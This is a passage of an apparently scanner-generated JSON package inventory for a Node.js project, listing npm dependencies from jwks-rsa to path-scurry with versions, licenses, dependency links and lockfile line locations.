"ecdsa-sig-formatter@1.0.11", "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 6634, "EndLine": 6644 } ], "AnalyzedBy": "npm" }, { "ID": "jwks-rsa@3.2.2", "Name": "jwks-rsa", "Identifier": { "PURL": "pkg:npm/jwks-rsa@3.2.2", "UID": "fe89c313d7459e0" }, "Version": "3.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/jsonwebtoken@9.0.10", "debug@4.4.3", "jose@4.15.9", "limiter@1.1.5", "lru-memoizer@2.3.0" ], "Locations": [ { "StartLine": 6645, "EndLine": 6660 } ], "AnalyzedBy": "npm" }, { "ID": "jws@4.0.1", "Name": "jws", "Identifier": { "PURL": "pkg:npm/jws@4.0.1", "UID": "538793c6a4f1bd07" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jwa@2.0.1", "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 6661, "EndLine": 6670 } ], "AnalyzedBy": "npm" }, { "ID": "leac@0.6.0", "Name": "leac", "Identifier": { "PURL": "pkg:npm/leac@0.6.0", "UID": "5426522bacdc68c3" }, "Version": "0.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6681, "EndLine": 6689 } ], "AnalyzedBy": "npm" }, { "ID": "lilconfig@3.1.3", "Name": "lilconfig", "Identifier": { "PURL": "pkg:npm/lilconfig@3.1.3", "UID": "2d00c145ded3a50c" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6704, "EndLine": 6715 } ], "AnalyzedBy": "npm" }, { "ID": "limiter@1.1.5", "Name": "limiter", "Identifier": { "PURL": "pkg:npm/limiter@1.1.5", "UID": "e4c47347752a8939" }, "Version": "1.1.5", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6716, "EndLine": 6720 } ], "AnalyzedBy": "npm" }, { "ID": "linebreak@1.1.0", "Name": "linebreak", "Identifier": { "PURL": "pkg:npm/linebreak@1.1.0", "UID": "4c907302ba1c3120" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@0.0.8", "unicode-trie@2.0.0" ], "Locations": [ { "StartLine": 6721, "EndLine": 6730 } ], "AnalyzedBy": "npm" }, { "ID": "lines-and-columns@1.2.4", "Name": "lines-and-columns", "Identifier": { "PURL": "pkg:npm/lines-and-columns@1.2.4", "UID": "c4ebb84e64c5f63f" }, "Version": "1.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6740, "EndLine": 6745 } ], "AnalyzedBy": "npm" }, { "ID": "locate-path@5.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@5.0.0", "UID": "9e45ca045a15f4eb" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@4.1.0" ], "Locations": [ { "StartLine": 8194, "EndLine": 8205 } ], "AnalyzedBy": "npm" }, { "ID": "lodash@4.18.1", "Name": "lodash", "Identifier": { "PURL": "pkg:npm/lodash@4.18.1", "UID": "5ba8b9617005b61d" }, "Version": "4.18.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6779, "EndLine": 6784 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.camelcase@4.3.0", "Name": "lodash.camelcase", "Identifier": { "PURL": "pkg:npm/lodash.camelcase@4.3.0", "UID": "fcc3409cbce306ac" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6785, "EndLine": 6791 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.clonedeep@4.5.0", "Name": "lodash.clonedeep", "Identifier": { "PURL": "pkg:npm/lodash.clonedeep@4.5.0", "UID": "e4993c005a08cc9e" }, "Version": "4.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6792, "EndLine": 6797 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.defaults@4.2.0", "Name": "lodash.defaults", "Identifier": { "PURL": "pkg:npm/lodash.defaults@4.2.0", "UID": "d24e54ccdb89d722" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6798, "EndLine": 6803 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.includes@4.3.0", "Name": "lodash.includes", "Identifier": { "PURL": "pkg:npm/lodash.includes@4.3.0", "UID": "96768791d1e454ad" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6804, "EndLine": 6809 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isarguments@3.1.0", "Name": "lodash.isarguments", "Identifier": { "PURL": "pkg:npm/lodash.isarguments@3.1.0", "UID": "48c95730b09be74b" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6810, "EndLine": 6815 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isboolean@3.0.3", "Name": "lodash.isboolean", "Identifier": { "PURL": "pkg:npm/lodash.isboolean@3.0.3", "UID": "efc8b0ca9afecf5f" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6816, "EndLine": 6821 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isinteger@4.0.4", "Name": "lodash.isinteger", "Identifier": { "PURL": "pkg:npm/lodash.isinteger@4.0.4", "UID": "a89cb36bce2d66ab" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6822, "EndLine": 6827 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isnumber@3.0.3", "Name": "lodash.isnumber", "Identifier": { "PURL": "pkg:npm/lodash.isnumber@3.0.3", "UID": "62f5d5cc4f6353bb" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6828, "EndLine": 6833 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isplainobject@4.0.6", "Name": "lodash.isplainobject", "Identifier": { "PURL": "pkg:npm/lodash.isplainobject@4.0.6", "UID": "f2ebf827bb5a6165" }, "Version": "4.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6834, "EndLine": 6839 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isstring@4.0.1", "Name": "lodash.isstring", "Identifier": { "PURL": "pkg:npm/lodash.isstring@4.0.1", "UID": "85dd7bd51409e649" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6840, "EndLine": 6845 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.once@4.1.1", "Name": "lodash.once", "Identifier": { "PURL": "pkg:npm/lodash.once@4.1.1", "UID": "87d9acafe05e83bd" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6853, "EndLine": 6858 } ], "AnalyzedBy": "npm" }, { "ID": "long@5.3.2", "Name": "long", "Identifier": { "PURL": "pkg:npm/long@5.3.2", "UID": "3550fa92d6346ba2" }, "Version": "5.3.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6859, "EndLine": 6865 } ], "AnalyzedBy": "npm" }, { "ID": "loose-envify@1.4.0", "Name": "loose-envify", "Identifier": { "PURL": "pkg:npm/loose-envify@1.4.0", "UID": "e5f7a9a038bfd9b7" }, "Version": "1.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "js-tokens@4.0.0" ], "Locations": [ { "StartLine": 6866, "EndLine": 6877 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@10.4.3", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@10.4.3", "UID": "97517bd840db192e" }, "Version": "10.4.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7713, "EndLine": 7718 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@6.0.0", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@6.0.0", "UID": "13c0c9ca03237570" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@4.0.0" ], "Locations": [ { "StartLine": 6888, "EndLine": 6899 } ], "AnalyzedBy": "npm" }, { "ID": "lru-memoizer@2.3.0", "Name": "lru-memoizer", "Identifier": { "PURL": "pkg:npm/lru-memoizer@2.3.0", "UID": "395282642de029d2" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.clonedeep@4.5.0", "lru-cache@6.0.0" ], "Locations": [ { "StartLine": 6900, "EndLine": 6909 } ], "AnalyzedBy": "npm" }, { "ID": "lucide-react@0.376.0", "Name": "lucide-react", "Identifier": { "PURL": "pkg:npm/lucide-react@0.376.0", "UID": "86cd179a2e47f5ad" }, "Version": "0.376.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react@18.3.1" ], "Locations": [ { "StartLine": 6910, "EndLine": 6918 } ], "AnalyzedBy": "npm" }, { "ID": "math-intrinsics@1.1.0", "Name": "math-intrinsics", "Identifier": { "PURL": "pkg:npm/math-intrinsics@1.1.0", "UID": "dad0c520e0c4c251" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6936, "EndLine": 6944 } ], "AnalyzedBy": "npm" }, { "ID": "media-engine@1.0.3", "Name": "media-engine", "Identifier": { "PURL": "pkg:npm/media-engine@1.0.3", "UID": "83ad3940984e5ba0" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6945, "EndLine": 6950 } ], "AnalyzedBy": "npm" }, { "ID": "media-typer@0.3.0", "Name": "media-typer", "Identifier": { "PURL": "pkg:npm/media-typer@0.3.0", "UID": "f60a9757197fc5e8" }, "Version": "0.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6951, "EndLine": 6959 } ], "AnalyzedBy": "npm" }, { "ID": "merge-descriptors@1.0.3", "Name": "merge-descriptors", "Identifier": { "PURL": "pkg:npm/merge-descriptors@1.0.3", "UID": "a0bc67e6d62b78c1" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6960, "EndLine": 6968 } ], "AnalyzedBy": "npm" }, { "ID": "merge2@1.4.1", "Name": "merge2", "Identifier": { "PURL": "pkg:npm/merge2@1.4.1", "UID": "20fea557152f8479" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6976, "EndLine": 6984 } ], "AnalyzedBy": "npm" }, { "ID": "methods@1.1.2", "Name": "methods", "Identifier": { "PURL": "pkg:npm/methods@1.1.2", "UID": "957eb486393ca9af" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6985, "EndLine": 6993 } ], "AnalyzedBy": "npm" }, { "ID": "micromatch@4.0.8", "Name": "micromatch", "Identifier": { "PURL": "pkg:npm/micromatch@4.0.8", "UID": "9df7f123bc92cfff" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "braces@3.0.3", "picomatch@2.3.2" ], "Locations": [ { "StartLine": 6994, "EndLine": 7006 } ], "AnalyzedBy": "npm" }, { "ID": "mime@1.6.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@1.6.0", "UID": "21560e86ca147824" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8843, "EndLine": 8854 } ], "AnalyzedBy": "npm" }, { "ID": "mime@3.0.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@3.0.0", "UID": "e32b647e171b7380" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7007, "EndLine": 7019 } ], "AnalyzedBy": "npm" }, { "ID": "mime-db@1.52.0", "Name": "mime-db", "Identifier": { "PURL": "pkg:npm/mime-db@1.52.0", "UID": "2ce5f194533d6173" }, "Version": "1.52.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7020, "EndLine": 7028 } ], "AnalyzedBy": "npm" }, { "ID": "mime-types@2.1.35", "Name": "mime-types", "Identifier": { "PURL": "pkg:npm/mime-types@2.1.35", "UID": "65afcc106284429d" }, "Version": "2.1.35", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-db@1.52.0" ], "Locations": [ { "StartLine": 7029, "EndLine": 7040 } ], "AnalyzedBy": "npm" }, { "ID": "minimatch@9.0.9", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@9.0.9", "UID": "324892524ef5351a" }, "Version": "9.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@2.1.0" ], "Locations": [ { "StartLine": 4741, "EndLine": 4755 }, { "StartLine": 6532, "EndLine": 6546 } ], "AnalyzedBy": "npm" }, { "ID": "minimist@1.2.8", "Name": "minimist", "Identifier": { "PURL": "pkg:npm/minimist@1.2.8", "UID": "28ad7020fdd2e3a1" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7067, "EndLine": 7075 } ], "AnalyzedBy": "npm" }, { "ID": "minipass@7.1.3", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@7.1.3", "UID": "40d1ab7ea826c5ef" }, "Version": "7.1.3", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7076, "EndLine": 7084 } ], "AnalyzedBy": "npm" }, { "ID": "mkdirp@0.5.6", "Name": "mkdirp", "Identifier": { "PURL": "pkg:npm/mkdirp@0.5.6", "UID": "37fbd69b14cc53c5" }, "Version": "0.5.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minimist@1.2.8" ], "Locations": [ { "StartLine": 7085, "EndLine": 7096 } ], "AnalyzedBy": "npm" }, { "ID": "morgan@1.10.1", "Name": "morgan", "Identifier": { "PURL": "pkg:npm/morgan@1.10.1", "UID": "4599b2b7fb127375" }, "Version": "1.10.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "basic-auth@2.0.1", "debug@2.6.9", "depd@2.0.0", "on-finished@2.3.0", "on-headers@1.1.0" ], "Locations": [ { "StartLine": 7117, "EndLine": 7132 } ], "AnalyzedBy": "npm" }, { "ID": "ms@2.0.0", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.0.0", "UID": "696342f7975a90f8" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3709, "EndLine": 3714 }, { "StartLine": 5283, "EndLine": 5288 }, { "StartLine": 5486, "EndLine": 5491 }, { "StartLine": 7142, "EndLine": 7147 }, { "StartLine": 8837, "EndLine": 8842 } ], "AnalyzedBy": "npm" }, { "ID": "ms@2.1.3", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.1.3", "UID": "f122486c1e8651db" }, "Version": "2.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7160, "EndLine": 7165 } ], "AnalyzedBy": "npm" }, { "ID": "multer@1.4.5-lts.2", "Name": "multer", "Identifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "99f2d2a7a48c940f" }, "Version": "1.4.5-lts.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "append-field@1.0.0", "busboy@1.6.0", "concat-stream@1.6.2", "mkdirp@0.5.6", "object-assign@4.1.1", "type-is@1.6.18", "xtend@4.0.2" ], "Locations": [ { "StartLine": 7166, "EndLine": 7184 } ], "AnalyzedBy": "npm" }, { "ID": "mz@2.7.0", "Name": "mz", "Identifier": { "PURL": "pkg:npm/mz@2.7.0", "UID": "aa35088acdc0d8ed" }, "Version": "2.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "any-promise@1.3.0", "object-assign@4.1.1", "thenify-all@1.6.0" ], "Locations": [ { "StartLine": 7185, "EndLine": 7195 } ], "AnalyzedBy": "npm" }, { "ID": "nanoid@3.3.11", "Name": "nanoid", "Identifier": { "PURL": "pkg:npm/nanoid@3.3.11", "UID": "136a8cbbf8f62ade" }, "Version": "3.3.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7196, "EndLine": 7213 } ], "AnalyzedBy": "npm" }, { "ID": "negotiator@0.6.3", "Name": "negotiator", "Identifier": { "PURL": "pkg:npm/negotiator@0.6.3", "UID": "aab82128daefade6" }, "Version": "0.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7221, "EndLine": 7229 } ], "AnalyzedBy": "npm" }, { "ID": "next@14.2.3", "Name": "next", "Identifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@next/env@14.2.3", "@next/swc-darwin-arm64@14.2.3", "@next/swc-darwin-x64@14.2.3", "@next/swc-linux-arm64-gnu@14.2.3", "@next/swc-linux-arm64-musl@14.2.3", "@next/swc-linux-x64-gnu@14.2.3", "@next/swc-linux-x64-musl@14.2.3", "@next/swc-win32-arm64-msvc@14.2.3", "@next/swc-win32-ia32-msvc@14.2.3", "@next/swc-win32-x64-msvc@14.2.3", "@opentelemetry/api@1.9.1", "@swc/helpers@0.5.5", "busboy@1.6.0", "caniuse-lite@1.0.30001791", "graceful-fs@4.2.11", "postcss@8.4.31", "react-dom@18.3.1", "react@18.3.1", "styled-jsx@5.1.1" ], "Locations": [ { "StartLine": 7230, "EndLine": 7280 } ], "AnalyzedBy": "npm" }, { "ID": "node-cron@3.0.3", "Name": "node-cron", "Identifier": { "PURL": "pkg:npm/node-cron@3.0.3", "UID": "a55af158ab6791a8" }, "Version": "3.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "uuid@8.3.2" ], "Locations": [ { "StartLine": 7319, "EndLine": 7330 } ], "AnalyzedBy": "npm" }, { "ID": "node-fetch@2.7.0", "Name": "node-fetch", "Identifier": { "PURL": "pkg:npm/node-fetch@2.7.0", "UID": "a0aace87e54d8c18" }, "Version": "2.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "whatwg-url@5.0.0" ], "Locations": [ { "StartLine": 7341, "EndLine": 7360 } ], "AnalyzedBy": "npm" }, { "ID": "node-forge@1.4.0", "Name": "node-forge", "Identifier": { "PURL": "pkg:npm/node-forge@1.4.0", "UID": "255c056a133e1e9e" }, "Version": "1.4.0", "Licenses": [ "(BSD-3-Clause OR GPL-2.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7361, "EndLine": 7369 } ], "AnalyzedBy": "npm" }, { "ID": "node-releases@2.0.38", "Name": "node-releases", "Identifier": { "PURL": "pkg:npm/node-releases@2.0.38", "UID": "f1acf134e6c7e346" }, "Version": "2.0.38", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7370, "EndLine": 7375 } ], "AnalyzedBy": "npm" }, { "ID": "nodemailer@6.10.1", "Name": "nodemailer", "Identifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "Version": "6.10.1", "Licenses": [ "MIT-0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7376, "EndLine": 7384 } ], "AnalyzedBy": "npm" }, { "ID": "nopt@7.2.1", "Name": "nopt", "Identifier": { "PURL": "pkg:npm/nopt@7.2.1", "UID": "16f512d219919253" }, "Version": "7.2.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "abbrev@2.0.0" ], "Locations": [ { "StartLine": 7385, "EndLine": 7399 } ], "AnalyzedBy": "npm" }, { "ID": "normalize-path@3.0.0", "Name": "normalize-path", "Identifier": { "PURL": "pkg:npm/normalize-path@3.0.0", "UID": "8bb3455d7b2538ee" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7400, "EndLine": 7408 } ], "AnalyzedBy": "npm" }, { "ID": "normalize-svg-path@1.1.0", "Name": "normalize-svg-path", "Identifier": { "PURL": "pkg:npm/normalize-svg-path@1.1.0", "UID": "b319a941cd009f1a" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "svg-arc-to-cubic-bezier@3.2.0" ], "Locations": [ { "StartLine": 7409, "EndLine": 7417 } ], "AnalyzedBy": "npm" }, { "ID": "object-assign@4.1.1", "Name": "object-assign", "Identifier": { "PURL": "pkg:npm/object-assign@4.1.1", "UID": "e8db72cee55f18e8" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7447, "EndLine": 7455 } ], "AnalyzedBy": "npm" }, { "ID": "object-hash@3.0.0", "Name": "object-hash", "Identifier": { "PURL": "pkg:npm/object-hash@3.0.0", "UID": "ffc9df41e98ed621" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7456, "EndLine": 7464 } ], "AnalyzedBy": "npm" }, { "ID": "object-inspect@1.13.4", "Name": "object-inspect", "Identifier": { "PURL": "pkg:npm/object-inspect@1.13.4", "UID": "8cd8e4fad052d730" }, "Version": "1.13.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7465, "EndLine": 7476 } ], "AnalyzedBy": "npm" }, { "ID": "on-finished@2.3.0", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.3.0", "UID": "45cb1d2ea8b1f9ff" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 7148, "EndLine": 7159 } ], "AnalyzedBy": "npm" }, { "ID": "on-finished@2.4.1", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.4.1", "UID": "ebb24fe42ba4772a" }, "Version": "2.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 7477, "EndLine": 7488 } ], "AnalyzedBy": "npm" }, { "ID": "on-headers@1.1.0", "Name": "on-headers", "Identifier": { "PURL": "pkg:npm/on-headers@1.1.0", "UID": "c5d2e2465151b642" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7489, "EndLine": 7497 } ], "AnalyzedBy": "npm" }, { "ID": "once@1.4.0", "Name": "once", "Identifier": { "PURL": "pkg:npm/once@1.4.0", "UID": "cbfbf587f38d05b" }, "Version": "1.4.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "wrappy@1.0.2" ], "Locations": [ { "StartLine": 7498, "EndLine": 7507 } ], "AnalyzedBy": "npm" }, { "ID": "otplib@12.0.1", "Name": "otplib", "Identifier": { "PURL": "pkg:npm/otplib@12.0.1", "UID": "776135e14785ec17" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "@otplib/preset-default@12.0.1", "@otplib/preset-v11@12.0.1" ], "Locations": [ { "StartLine": 7542, "EndLine": 7552 } ], "AnalyzedBy": "npm" }, { "ID": "p-limit@2.3.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@2.3.0", "UID": "9e64192ed02b9ac0" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-try@2.2.0" ], "Locations": [ { "StartLine": 8206, "EndLine": 8220 } ], "AnalyzedBy": "npm" }, { "ID": "p-limit@3.1.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@3.1.0", "UID": "292b088aef2a13be" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yocto-queue@0.1.0" ], "Locations": [ { "StartLine": 7553, "EndLine": 7568 } ], "AnalyzedBy": "npm" }, { "ID": "p-locate@4.1.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@4.1.0", "UID": "67a8877055feb02e" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@2.3.0" ], "Locations": [ { "StartLine": 8221, "EndLine": 8232 } ], "AnalyzedBy": "npm" }, { "ID": "p-try@2.2.0", "Name": "p-try", "Identifier": { "PURL": "pkg:npm/p-try@2.2.0", "UID": "888cfeca07a6fa9" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7585, "EndLine": 7593 } ], "AnalyzedBy": "npm" }, { "ID": "package-json-from-dist@1.0.1", "Name": "package-json-from-dist", "Identifier": { "PURL": "pkg:npm/package-json-from-dist@1.0.1", "UID": "58b0ffcf1de276b9" }, "Version": "1.0.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7594, "EndLine": 7599 } ], "AnalyzedBy": "npm" }, { "ID": "pako@0.2.9", "Name": "pako", "Identifier": { "PURL": "pkg:npm/pako@0.2.9", "UID": "6a5e356a14ccc056" }, "Version": "0.2.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10146, "EndLine": 10151 } ], "AnalyzedBy": "npm" }, { "ID": "pako@1.0.11", "Name": "pako", "Identifier": { "PURL": "pkg:npm/pako@1.0.11", "UID": "9e45c26f41a17898" }, "Version": "1.0.11", "Licenses": [ "(MIT AND Zlib)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7600, "EndLine": 7605 } ], "AnalyzedBy": "npm" }, { "ID": "parse-svg-path@0.1.2", "Name": "parse-svg-path", "Identifier": { "PURL": "pkg:npm/parse-svg-path@0.1.2", "UID": "b3f4d5efa4bcf2b0" }, "Version": "0.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7619, "EndLine": 7624 } ], "AnalyzedBy": "npm" }, { "ID": "parseley@0.12.1", "Name": "parseley", "Identifier": { "PURL": "pkg:npm/parseley@0.12.1", "UID": "f209a070b68b80a9" }, "Version": "0.12.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "leac@0.6.0", "peberminta@0.9.0" ], "Locations": [ { "StartLine": 7625, "EndLine": 7637 } ], "AnalyzedBy": "npm" }, { "ID": "parseurl@1.3.3", "Name": "parseurl", "Identifier": { "PURL": "pkg:npm/parseurl@1.3.3", "UID": "c6495bf0752e80c1" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7638, "EndLine": 7646 } ], "AnalyzedBy": "npm" }, { "ID": "path-exists@4.0.0", "Name": "path-exists", "Identifier": { "PURL": "pkg:npm/path-exists@4.0.0", "UID": "e5c3eee35b22deed" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7647, "EndLine": 7655 } ], "AnalyzedBy": "npm" }, { "ID": "path-expression-matcher@1.5.0", "Name": "path-expression-matcher", "Identifier": { "PURL": "pkg:npm/path-expression-matcher@1.5.0", "UID": "c0d21769c71dee35" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7656, "EndLine": 7671 } ], "AnalyzedBy": "npm" }, { "ID": "path-key@3.1.1", "Name": "path-key", "Identifier": { "PURL": "pkg:npm/path-key@3.1.1", "UID": "bfb38d2c0d2ed1df" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7682, "EndLine": 7690 } ], "AnalyzedBy": "npm" }, { "ID": "path-parse@1.0.7", "Name": "path-parse", "Identifier": { "PURL": "pkg:npm/path-parse@1.0.7", "UID": "94fa1bd0faea0f9f" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7691, "EndLine": 7696 } ], "AnalyzedBy": "npm" }, { "ID": "path-scurry@1.11.1", "Name": "path-scurry", "Identifier": { 